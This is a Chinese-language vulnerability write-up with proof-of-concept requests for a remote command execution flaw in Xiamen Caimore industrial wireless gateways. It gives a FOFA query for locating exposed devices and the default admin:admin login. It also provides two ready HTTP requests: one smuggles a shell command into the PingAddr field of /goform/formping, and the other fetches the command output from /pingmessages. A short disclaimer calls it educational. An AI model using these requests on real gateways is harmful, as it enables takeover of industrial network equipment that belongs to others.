---

前言

厦门才茂通信网关formping存在远程命令执行漏洞，攻击者可通过特定payload对目标服务器发起攻击，造成不可估量的影响。

---

声明

请勿利用文章内的相关技术从事非法测试，由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失，均由使用者本人负责，所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用。

一、漏洞描述

厦门才茂网关，采用开放式软件架构设计，是一款金属外壳设计，带4路千兆LAN、1路千兆WAN，采用 3G/4G/5G 广域网络上网通信的工业级设计无线网关，支持2.4GWiFi和5.8GWiFi

厦门才茂网关系统formping存在命令执行漏洞，攻击者通过漏洞可以执行任意命令，导致服务器失陷。

二、漏洞复现

FOFA：app=" CAIMORE-Gateway"

弱口令 admin:admin 登录，通过漏洞执行linux命令，在通过访问指定参数得到回显

Payload如下：

POC1:
POST /goform/formping HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Content-Length: 63
Authorization: Basic YWRtaW46YWRtaW4=
Accept-Encoding: gzip

PingAddr=127.0.0.1%7Cecho%20hellocaimao&PingPackNumb=1&PingMsg=

POC2:
GET /pingmessages HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Authorization: Basic YWRtaW46YWRtaW4=
Accept-Encoding: gzip

访问应用会出现弹窗认证(401)机制，输入 admin:admin 登录


POC验证如下：